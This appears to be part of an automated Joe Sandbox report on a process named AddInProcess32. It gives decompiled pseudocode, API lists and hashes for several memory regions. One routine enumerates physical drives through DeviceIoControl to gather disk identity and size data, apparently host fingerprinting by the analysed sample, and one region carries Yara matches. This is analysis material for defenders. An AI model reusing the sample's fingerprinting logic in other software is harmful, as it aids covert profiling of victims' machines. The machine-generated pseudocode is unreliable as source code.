                                              						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t96 + 0x14))))(_t96, _t115, 0);
                                              						__eflags = _t163;
                                              						if(_t163 < 0) {
                                              							goto L27;
                                              						}
                                              						_t98 = _v896;
                                              						_t100 =  *((intOrPtr*)( *((intOrPtr*)( *_t98))))(_t98, 0x40d2ec,  &_v872);
                                              						__eflags = _t100;
                                              						if(_t100 < 0) {
                                              							L25:
                                              							_t101 = _v908;
                                              							_t103 =  *((intOrPtr*)( *((intOrPtr*)( *_t101 + 0xc))))(_t101, _t166, _v896,  &_v864, 0);
                                              							L26:
                                              							_t163 = _t103;
                                              							goto L27;
                                              						}
                                              						_t104 = _v884;
                                              						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x18))))(_t104,  &_v876);
                                              						__eflags = _t163;
                                              						if(_t163 < 0) {
                                              							L18:
                                              							_t117 = 0;
                                              							__eflags = 0;
                                              							L19:
                                              							_t107 = _v892;
                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))(_t107);
                                              							__eflags = _t117;
                                              							if(_t117 == 0) {
                                              								goto L25;
                                              							}
                                              							_t103 =  &_v204;
                                              							_push(_t103);
                                              							_push(0);
                                              							_push( &_v284);
                                              							_push(_v884);
                                              							L00403172();
                                              							__eflags = _t103;
                                              							if(__eflags == 0) {
                                              								_t109 =  &_v924;
                                              								_push(_t109);
                                              								_push(_t166);
                                              								_push( &_v220);
                                              								_push( &_v300);
                                              								L0040316C();
                                              								__eflags = _t109 - 3;
                                              								if(_t109 != 3) {
                                              									_t163 = 0x80004023;
                                              								}
                                              								goto L27;
                                              							}
                                              							if(__eflags > 0) {
                                              								_t103 = _t103 & 0x0000ffff | 0x80070000;
                                              							}
                                              							goto L26;
                                              						}
                                              						__eflags = _v884 & 0x00001000;
                                              						if((_v884 & 0x00001000) == 0) {
                                              							goto L18;
                                              						}
                                              						_t117 = 1;
                                              						goto L19;
                                              					} else {
                                              						_t163 = 0;
                                              						goto L28;
                                              					}
                                              				} else {
                                              					_t111 = GetLastError();
                                              					if(_t111 > 0) {
                                              						_t163 = _t111 & 0x0000ffff | 0x80070000;
                                              					} else {
                                              						_t163 = _t111;
                                              					}
                                              					goto L28;
                                              				}
                                              			}










































































                                              0x004029c0
                                              0x004029c6
                                              0x004029cd
                                              0x004029d6
                                              0x004029ea
                                              0x004029ee
                                              0x004029f2
                                              0x004029fa
                                              0x004029fe
                                              0x00402a02
                                              0x00402a06
                                              0x00402a0a
                                              0x00402a0e
                                              0x00402a12
                                              0x00402a16
                                              0x00402a1e
                                              0x00402a2e
                                              0x00402a36
                                              0x00402a3b
                                              0x00402a43
                                              0x00402a49
                                              0x00402a4d
                                              0x00402c33
                                              0x00402c33
                                              0x00402c39
                                              0x00402c41
                                              0x00402c41
                                              0x00402c43
                                              0x00402c49
                                              0x00402c51
                                              0x00402c51
                                              0x00402c53
                                              0x00402c59
                                              0x00402c5b
                                              0x00402c66
                                              0x00402c66
                                              0x00402c68
                                              0x00402c6e
                                              0x00402c76
                                              0x00402c76
                                              0x00402c78
                                              0x00402c7e
                                              0x00402c86
                                              0x00402c86
                                              0x00402c92
                                              0x00402c94
                                              0x00402c97
                                              0x00402c9c
                                              0x00402ca7
                                              0x00402ca7
                                              0x00402a53
                                              0x00402a58
                                              0x00402a5e
                                              0x00402a62
                                              0x00000000
                                              0x00000000
                                              0x00402a82
                                              0x00402aa6
                                              0x00402ab7
                                              0x00402ac6
                                              0x00402ac8
                                              0x00402aca
                                              0x00402acc
                                              0x00000000
                                              0x00000000
                                              0x00402ad2
                                              0x00402ada
                                              0x00402ae4
                                              0x00402aea
                                              0x00402aec
                                              0x00402aee
                                              0x00000000
                                              0x00000000
                                              0x00402b06
                                              0x00402b0c
                                              0x00402b0e
                                              0x00402b10
                                              0x00402c2d
                                              0x00402c2d
                                              0x00000000
                                              0x00402c2d
                                              0x00402b16
                                              0x00402b27
                                              0x00402b29
                                              0x00402b2b
                                              0x00000000
                                              0x00000000
                                              0x00402b31
                                              0x00402b46
                                              0x00402b48
                                              0x00402b4a
                                              0x00000000
                                              0x00000000
                                              0x00402b50
                                              0x00402b5e
                                              0x00402b60
                                              0x00402b62
                                              0x00000000
                                              0x00000000
                                              0x00402b68
                                              0x00402b7b
                                              0x00402b7d
                                              0x00402b7f
                                              0x00402c13
                                              0x00402c13
                                              0x00402c29
                                              0x00402c2b
                                              0x00402c2b
                                              0x00000000
                                              0x00402c2b
                                              0x00402b85
                                              0x00402b96
                                              0x00402b98
                                              0x00402b9a
                                              0x00402bad
                                              0x00402bad
                                              0x00402bad
                                              0x00402baf
                                              0x00402baf
                                              0x00402bb9
                                              0x00402bbb
                                              0x00402bbd
                                              0x00000000
                                              0x00000000
                                              0x00402bc3
                                              0x00402bca
                                              0x00402bcb
                                              0x00402bd3
                                              0x00402bd4
                                              0x00402bd5
                                              0x00402bda
                                              0x00402bdc
                                              0x00402bec
                                              0x00402bf0
                                              0x00402bf1
                                              0x00402bf9
                                              0x00402c01
                                              0x00402c02
                                              0x00402c07
                                              0x00402c0a
                                              0x00402c0c
                                              0x00402c0c
                                              0x00000000
                                              0x00402c0a
                                              0x00402bde
                                              0x00402be5
                                              0x00402be5
                                              0x00000000
                                              0x00402bde
                                              0x00402b9c
                                              0x00402ba4
                                              0x00000000
                                              0x00000000
                                              0x00402ba6
                                              0x00000000
                                              0x00402adc
                                              0x00402adc
                                              0x00000000
                                              0x00402adc
                                              0x00402a84
                                              0x00402a84
                                              0x00402a8c
                                              0x00402a9f
                                              0x00402a8e
                                              0x00402a8e
                                              0x00402a8e
                                              0x00000000
                                              0x00402a8c

                                              APIs
                                              • _memset.LIBCMT ref: 00402A1E
                                              • _memset.LIBCMT ref: 00402A36
                                              • SHGetMalloc.SHELL32(?), ref: 00402A43
                                              • SHGetDesktopFolder.SHELL32(?,?,?,?), ref: 00402A58
                                              • SearchPathW.KERNEL32(00000000,?,.exe,?,?,?,?,?,?), ref: 00402A7A
                                              • GetLastError.KERNEL32(?,.exe,?,?,?,?,?,?), ref: 00402A84
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: _memset$DesktopErrorFolderLastMallocPathSearch
                                              • String ID: .exe
                                              • API String ID: 1184172398-4119554291
                                              • Opcode ID: fb7a9b76fc0a125024f92bf21f90df84a81b0ed7226d44e92ef0621ef33c86bd
                                              • Instruction ID: 348cd96654d2abbfe703da2164321630b7e188129bd778ae1d25fea451b48038
                                              • Opcode Fuzzy Hash: fb7a9b76fc0a125024f92bf21f90df84a81b0ed7226d44e92ef0621ef33c86bd
                                              • Instruction Fuzzy Hash: E981AD71508200AFD320EF58C988D6FB7E9AFC8704F144A6DF549E7290D6B8ED45CBA6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E02B5355B(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				char _v108;
                                              				short _v620;
                                              				intOrPtr _v2904;
                                              				intOrPtr _v2908;
                                              				void _v2920;
                                              				signed int _v2928;
                                              				void _v2932;
                                              				signed int _v2936;
                                              				signed int _v2940;
                                              				intOrPtr _v2944;
                                              				intOrPtr _v2952;
                                              				void _v2956;
                                              				long _v2960;
                                              				long _v2964;
                                              				signed int _t46;
                                              				void* _t56;
                                              				intOrPtr _t70;
                                              				intOrPtr _t71;
                                              				signed int _t83;
                                              				char* _t85;
                                              				signed int _t96;
                                              				void* _t99;
                                              				void* _t101;
                                              				signed int _t102;
                                              				long* _t103;
                                              
                                              				_t46 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t46 ^ _t102;
                                              				_t85 = __ecx;
                                              				_t101 = 0;
                                              				 *((char*)(__ecx)) = 0;
                                              				do {
                                              					wsprintfW( &_v620, L"\\\\.\\PhysicalDrive%d", _t101);
                                              					_t103 =  &(_t103[3]);
                                              					_t99 = CreateFileW( &_v620, 0, 3, 0, 3, 0, 0);
                                              					if(_t99 != 0xffffffff) {
                                              						_v2964 = _v2964 & 0x00000000;
                                              						_t56 = E02B52CE7(_t52,  &_v2932, 0xc);
                                              						_v2932 = _v2932 & 0x00000000;
                                              						_v2928 = _v2928 & 0x00000000;
                                              						 *_t103 = 0x8fc;
                                              						E02B52CE7(_t56,  &_v2920);
                                              						if(DeviceIoControl(_t99, 0x2d1400,  &_v2932, 0xc,  &_v2920, 0x8fc,  &_v2964, 0) != 0) {
                                              							_v2960 = 0;
                                              							if(DeviceIoControl(_t99, 0x70000, 0, 0,  &_v2956, 0x18,  &_v2960, 0) == 0) {
                                              								_v2960 = _v2960 & 0x00000000;
                                              							} else {
                                              								_t96 = _v2936 * _v2940 >> 0x20;
                                              								_t83 = E02B53E50(E02B53E50(_v2936 * _v2940, _t96, _v2944, 0), _t96, _v2956, _v2952);
                                              								_t65 = (_t96 << 0x00000020 | _t83) >> 0x1e;
                                              								_v2960 = (_t96 << 0x00000020 | _t83) >> 0x1e;
                                              							}
                                              							E02B52CE7(_t65,  &_v108, 0x64);
                                              							 *_t103 = "---";
                                              							lstrcpyA( &_v108, ??);
                                              							 *0x2b59470 =  *0x2b59470 + _v2960;
                                              							_t70 = _v2908;
                                              							if(_t70 != 0) {
                                              								lstrcatA( &_v108, _t70 +  &_v2920);
                                              							}
                                              							_t71 = _v2904;
                                              							if(_t71 != 0) {
                                              								lstrcatA( &_v108, _t71 +  &_v2920);
                                              							}
                                              							StrNCatA(_t85,  &_v108, 0x28a);
                                              						}
                                              						CloseHandle(_t99);
                                              					}
                                              					_t101 = _t101 + 1;
                                              				} while (_t101 < 0x64);
                                              				StrNCatA(_t85, "---", 0x28a);
                                              				return E02B53C33(_v8 ^ _t102);
                                              			}





























                                              0x02b53564
                                              0x02b5356b
                                              0x02b5356f
                                              0x02b53573
                                              0x02b53575
                                              0x02b53578
                                              0x02b53585
                                              0x02b5358b
                                              0x02b535a5
                                              0x02b535aa
                                              0x02b535b0
                                              0x02b535bf
                                              0x02b535c4
                                              0x02b535d1
                                              0x02b535d8
                                              0x02b535df
                                              0x02b53611
                                              0x02b53629
                                              0x02b53640
                                              0x02b5367f
                                              0x02b53642
                                              0x02b53648
                                              0x02b5366b
                                              0x02b53670
                                              0x02b53674
                                              0x02b5367a
                                              0x02b5368b
                                              0x02b53693
                                              0x02b5369b
                                              0x02b536a7
                                              0x02b536ad
                                              0x02b536b5
                                              0x02b536c4
                                              0x02b536c4
                                              0x02b536ca
                                              0x02b536d2
                                              0x02b536e1
                                              0x02b536e1
                                              0x02b536f1
                                              0x02b536f1
                                              0x02b536f8
                                              0x02b536f8
                                              0x02b536fe
                                              0x02b536ff
                                              0x02b53713
                                              0x02b5372b

                                              APIs
                                              • wsprintfW.USER32 ref: 02B53585
                                              • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 02B5359F
                                              • DeviceIoControl.KERNEL32 ref: 02B53609
                                              • DeviceIoControl.KERNEL32 ref: 02B53638
                                              • lstrcpyA.KERNEL32(?,00000064), ref: 02B5369B
                                              • lstrcatA.KERNEL32(?,?), ref: 02B536C4
                                              • lstrcatA.KERNEL32(?,?), ref: 02B536E1
                                              • StrNCatA.SHLWAPI(?,?,0000028A), ref: 02B536F1
                                              • CloseHandle.KERNEL32(00000000), ref: 02B536F8
                                              • StrNCatA.SHLWAPI(?,---,0000028A), ref: 02B53713
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ControlDevicelstrcat$CloseCreateFileHandlelstrcpywsprintf
                                              • String ID: ---$\\.\PhysicalDrive%d
                                              • API String ID: 2918303280-2389916857
                                              • Opcode ID: 20e46dda7bb7f739cbf91084d7b6b2556cc6e07162c68bbdb861941e2ae98bdf
                                              • Instruction ID: 8706a26ed80b4c8c20ffd7dddc755a4eb3619ae0ccefe95d38d45717109d869f
                                              • Opcode Fuzzy Hash: 20e46dda7bb7f739cbf91084d7b6b2556cc6e07162c68bbdb861941e2ae98bdf
                                              • Instruction Fuzzy Hash: 04516072A40328AFEB119FA0DC49FAA77BCEF04754F0445D9B909EB180DB759A94CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00407219() {
                                              
                                              				SetUnhandledExceptionFilter(E004071DC);
                                              				return 0;
                                              			}



                                              0x0040721e
                                              0x00407226

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_000071DC), ref: 0040721E
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 60dce524007cd36b1afbdad1174eb971ab13da7a47c5473fb774a753f846e0e8
                                              • Instruction ID: 4a2c546b5ce0fac6330c053a0bce39fcca3f6a47db525e6d2e0361f563a01c8d
                                              • Opcode Fuzzy Hash: 60dce524007cd36b1afbdad1174eb971ab13da7a47c5473fb774a753f846e0e8
                                              • Instruction Fuzzy Hash: 489002B0A651044EC6001FB05D0950535905A896127514871A401FC1D4EE7454449D6A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_1380000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de94b6e7ba717fe7bfd838e2ebb51f2c74a3f24c5ea4661c3e3b03928f95739b
                                              • Instruction ID: e2ec0dc0d522a164dab598bcb263af9aa4d0bb8724df374b3716a027fb0f69c6
                                              • Opcode Fuzzy Hash: de94b6e7ba717fe7bfd838e2ebb51f2c74a3f24c5ea4661c3e3b03928f95739b
                                              • Instruction Fuzzy Hash: 49F0923703D2927BDAC8EA35D0955A37FF4FB5AB043613839C002EB006E626F4579241
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 69%
                                              			E00401D50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				signed int _v8;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				short _v552;
                                              				struct tagLOGFONTW _v644;
                                              				int _v652;
                                              				void* __ebx;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t21;
                                              				int _t23;
                                              				void* _t24;
                                              				struct HWND__* _t27;
                                              				int _t28;
                                              				long _t30;
                                              				void* _t41;
                                              				struct HBRUSH__* _t43;
                                              				void* _t45;
                                              				void* _t47;
                                              				void* _t48;
                                              				int _t71;
                                              				void* _t72;
                                              				void* _t73;
                                              				int _t74;
                                              				void* _t76;
                                              				struct HWND__* _t78;
                                              				struct HWND__* _t97;
                                              				long _t102;
                                              				void* _t103;
                                              				void* _t105;
                                              				void* _t108;
                                              				signed int _t109;
                                              				void* _t115;
                                              
                                              				_t111 = (_t109 & 0xfffffff8) - 0x274;
                                              				_t21 =  *0x413004; // 0x98fc836b
                                              				_v8 = _t21 ^ (_t109 & 0xfffffff8) - 0x00000274;
                                              				_t23 = _a8;
                                              				_t115 = _t23 - 0x138;
                                              				_t71 = _a12;
                                              				_t102 = _a16;
                                              				_t97 = _a4;
                                              				if(_t115 > 0) {
                                              					_t24 = _t23 - 0x200;
                                              					if(_t24 == 0) {
                                              						_push(_t102 >> 0x10);
                                              						_t27 = ChildWindowFromPoint(_t97, _t102 & 0x0000ffff);
                                              						_t78 =  *0x414aa4;
                                              						_t28 =  *0x414aa8;
                                              						if(_t28 == (0 | _t27 == _t78)) {
                                              							 *0x414aa8 = 0 | _t28 == 0x00000000;
                                              							InvalidateRect(_t78, 0, 0);
                                              							_t28 =  *0x414aa8;
                                              						}
                                              						if(_t28 == 0) {
                                              							SetCursor( *0x414a9c);
                                              						} else {
                                              							SetCursor( *0x414aa0);
                                              						}
                                              					} else {
                                              						if(_t24 == 2) {
                                              							_push(_t102 >> 0x10);
                                              							if(ChildWindowFromPoint(_t97, _t102 & 0x0000ffff) ==  *0x414aa4) {
                                              								ShellExecuteW(_t97, L"open", L"http://www.sysinternals.com", 0, 0, 1);
                                              							}
                                              						}
                                              					}
                                              					goto L25;
                                              				} else {
                                              					if(_t115 == 0) {
                                              						if(_t102 !=  *0x414aa4) {
                                              							goto L25;
                                              						} else {
                                              							SetBkMode(_t71, 1);
                                              							if(GetSysColorBrush(0x1a) == 0) {
                                              								_push(0xff0000);
                                              							} else {
                                              								_push(GetSysColor(0x1a));
                                              							}
                                              							SetTextColor(_t71, ??);
                                              							_t41 =  *0x414a98;
                                              							if( *0x414aa8 == 0) {
                                              								_t41 =  *0x414a94;
                                              							}
                                              							SelectObject(_t71, _t41);
                                              							_t43 = GetSysColorBrush(0xf);
                                              							_pop(_t105);
                                              							_pop(_t73);
                                              							E0040318A(_t43, _t73, _v32 ^ _t111, _t105);
                                              							return _t43;
                                              						}
                                              					} else {
                                              						_t45 = _t23 - 0x10;
                                              						if(_t45 == 0) {
                                              							L6:
                                              							EndDialog(_t97, 0);
                                              							PostQuitMessage(0);
                                              							goto L25;
                                              						} else {
                                              							_t47 = _t45 - 0x100;
                                              							if(_t47 == 0) {
                                              								_t48 = GetStockObject(0x11);
                                              								 *0x414a94 = _t48;
                                              								GetObjectW(_t48, 0x5c,  &(_v644.lfOrientation));
                                              								_v644.lfUnderline = 1;
                                              								 *0x414a98 = CreateFontIndirectW( &_v644);
                                              								 *0x414aa8 = 1;
                                              								 *0x414aa4 = GetDlgItem(_t97, 0x40a);
                                              								GetModuleFileNameW(0,  &_v552, 0x208);
                                              								_t74 = GetFileVersionInfoSizeW( &_v552,  &_v652);
                                              								GetFileVersionInfoW( &_v552, 0, _t74, E0040354A(_t74));
                                              								SetDlgItemTextW(_t97, 0x46c, E00401D00(_t55, L"FileVersion"));
                                              								SetDlgItemTextW(_t97, 0x46b, E00401D00(_t55, L"LegalCopyright"));
                                              								 *0x414a9c = LoadCursorW(GetModuleHandleW(0), L"HAND");
                                              								 *0x414aa0 = LoadCursorW(0, 0x7f00);
                                              								ShowWindow(_t97, 5);
                                              								_pop(_t108);
                                              								_pop(_t76);
                                              								E0040318A(1, _t76, _v28 ^ _t111 + 0xc, _t108);
                                              								return 1;
                                              							} else {
                                              								if(_t47 == 1 && (_t71 & 0x0000ffff) + 0xffffffff <= 1) {
                                              									goto L6;
                                              								}
                                              								L25:
                                              								_t30 = DefWindowProcW(_t97, _a8, _t71, _t102);
                                              								_pop(_t103);
                                              								_pop(_t72);
                                              								E0040318A(_t30, _t72, _v8 ^ _t111, _t103);
                                              								return _t30;
                                              							}
                                              						}
                                              					}
                                              				}
                                              			}




































                                              0x00401d56
                                              0x00401d5c
                                              0x00401d63
                                              0x00401d6a
                                              0x00401d6d
                                              0x00401d73
                                              0x00401d77
                                              0x00401d7b
                                              0x00401d7e
                                              0x00401f3b
                                              0x00401f40
                                              0x00401f85
                                              0x00401f88
                                              0x00401f8e
                                              0x00401f98
                                              0x00401fa2
                                              0x00401fb0
                                              0x00401fb6
                                              0x00401fbc
                                              0x00401fbc
                                              0x00401fc3
                                              0x00401fd4
                                              0x00401fc5
                                              0x00401fd4
                                              0x00401fd4
                                              0x00401f42
                                              0x00401f45
                                              0x00401f53
                                              0x00401f62
                                              0x00401f75
                                              0x00401f75
                                              0x00401f62
                                              0x00401f45
                                              0x00000000
                                              0x00401d84
                                              0x00401d84
                                              0x00401ed1
                                              0x00000000
                                              0x00401ed7
                                              0x00401eda
                                              0x00401eec
                                              0x00401ef9
                                              0x00401eee
                                              0x00401ef6
                                              0x00401ef6
                                              0x00401eff
                                              0x00401f0c
                                              0x00401f11
                                              0x00401f13
                                              0x00401f13
                                              0x00401f1a
                                              0x00401f22
                                              0x00401f25
                                              0x00401f26
                                              0x00401f30
                                              0x00401f38
                                              0x00401f38
                                              0x00401d8a
                                              0x00401d8a
                                              0x00401d8d
                                              0x00401dae
                                              0x00401db1
                                              0x00401db9
                                              0x00000000
                                              0x00401d8f
                                              0x00401d8f
                                              0x00401d94
                                              0x00401dc6
                                              0x00401dd4
                                              0x00401dd9
                                              0x00401de4
                                              0x00401df5
                                              0x00401dfa
                                              0x00401e0a
                                              0x00401e1b
                                              0x00401e30
                                              0x00401e46
                                              0x00401e65
                                              0x00401e7b
                                              0x00401e9a
                                              0x00401ea4
                                              0x00401ea9
                                              0x00401eb5
                                              0x00401eb6
                                              0x00401ec0
                                              0x00401ec8
                                              0x00401d96
                                              0x00401d99
                                              0x00000000
                                              0x00000000
                                              0x00401fda
                                              0x00401fe1
                                              0x00401fef
                                              0x00401ff0
                                              0x00401ff3
                                              0x00401ffb
                                              0x00401ffb
                                              0x00401d94
                                              0x00401d8d
                                              0x00401d84

                                              APIs
                                              • EndDialog.USER32(?,00000000), ref: 00401DB1
                                              • PostQuitMessage.USER32(00000000), ref: 00401DB9
                                              • GetStockObject.GDI32(00000011), ref: 00401DC6
                                              • GetObjectW.GDI32(00000000,0000005C,?), ref: 00401DD9
                                              • CreateFontIndirectW.GDI32 ref: 00401DE9
                                              • GetDlgItem.USER32 ref: 00401E04
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?), ref: 00401E1B
                                              • GetFileVersionInfoSizeW.VERSION(?,?,?,?,?,?,?,?,?,?), ref: 00401E2B
                                              • _malloc.LIBCMT ref: 00401E33
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00401E46
                                              • SetDlgItemTextW.USER32 ref: 00401E65
                                              • SetDlgItemTextW.USER32 ref: 00401E7B
                                              • GetModuleHandleW.KERNEL32(00000000,HAND), ref: 00401E84
                                              • LoadCursorW.USER32(00000000), ref: 00401E91
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00401E9F
                                              • ShowWindow.USER32(?,00000005), ref: 00401EA9
                                              • SetBkMode.GDI32(?,00000001), ref: 00401EDA
                                              • GetSysColorBrush.USER32(0000001A), ref: 00401EE8
                                              • GetSysColor.USER32(0000001A), ref: 00401EF0
                                              • SetTextColor.GDI32(?,00FF0000), ref: 00401EFF
                                              • SelectObject.GDI32(?,?), ref: 00401F1A
                                              • GetSysColorBrush.USER32(0000000F), ref: 00401F22
                                              • ChildWindowFromPoint.USER32 ref: 00401F56
                                              • ShellExecuteW.SHELL32(?,open,http://www.sysinternals.com,00000000,00000000,00000001), ref: 00401F75
                                              • ChildWindowFromPoint.USER32 ref: 00401F88
                                              • InvalidateRect.USER32(?,00000000,00000000,?,?), ref: 00401FB6
                                              • SetCursor.USER32(?,?,?), ref: 00401FD4
                                              • DefWindowProcW.USER32(?,?,?,?,?,?), ref: 00401FE1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ColorWindow$CursorFileItemObjectText$BrushChildFromInfoLoadModulePointVersion$CreateDialogExecuteFontHandleIndirectInvalidateMessageModeNamePostProcQuitRectSelectShellShowSizeStock_malloc
                                              • String ID: FileVersion$HAND$LegalCopyright$http://www.sysinternals.com$open
                                              • API String ID: 3345172160-4191033705
                                              • Opcode ID: 2f602c52077be3eec7b50e33d563c06f28bb8856962e059969dcbe1c2fda3ebc
                                              • Instruction ID: e26033b52e4dbe09ff1a83e59bdc46354e0d09b5a075afc51df58c3e83d68215
                                              • Opcode Fuzzy Hash: 2f602c52077be3eec7b50e33d563c06f28bb8856962e059969dcbe1c2fda3ebc
                                              • Instruction Fuzzy Hash: FC61D771640201AFE7109FA5ED89FBB37A8EF88741F11853AF509F61E1CB7898058B6D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 483 401930-4019cd RegDeleteKeyW * 12 484 4019e3-4019e5 483->484 485 4019cf-4019dd MessageBoxW 483->485 485->484
                                              C-Code - Quality: 100%
                                              			E00401930(char _a4) {
                                              
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user...\\Command");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user...");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user (netonly)...\\Command");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user (netonly)...");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user...\\Command");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user...");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user (netonly)...\\Command");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user (netonly)...");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user...\\Command");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user...");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user (netonly)...\\Command");
                                              				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user (netonly)...");
                                              				if(_a4 != 0) {
                                              					MessageBoxW(0, L"ShellRunas context menu handler unregistered.", L"ShellRunas - Sysinternals: www.sysinternals.com", 0x40);
                                              				}
                                              				return 0;
                                              			}



                                              0x00401941
                                              0x0040194d
                                              0x00401959
                                              0x00401965
                                              0x00401971
                                              0x0040197d
                                              0x00401989
                                              0x00401995
                                              0x004019a1
                                              0x004019ad
                                              0x004019b9
                                              0x004019c5
                                              0x004019cd
                                              0x004019dd
                                              0x004019dd
                                              0x004019e5

                                              APIs
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command), ref: 00401941
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...), ref: 0040194D
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command), ref: 00401959
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...), ref: 00401965
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user...\Command), ref: 00401971
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user...), ref: 0040197D
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command), ref: 00401989
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user (netonly)...), ref: 00401995
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command), ref: 004019A1
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...), ref: 004019AD
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command), ref: 004019B9
                                              • RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...), ref: 004019C5
                                              • MessageBoxW.USER32(00000000,ShellRunas context menu handler unregistered.,ShellRunas - Sysinternals: www.sysinternals.com,00000040), ref: 004019DD
                                              Strings
                                              • Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)..., xrefs: 004019BB
                                              • Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command, xrefs: 0040197F
                                              • Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)..., xrefs: 0040195B
                                              • Software\Classes\lnkfile\Shell\Run as different user..., xrefs: 00401973
                                              • Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command, xrefs: 004019AF
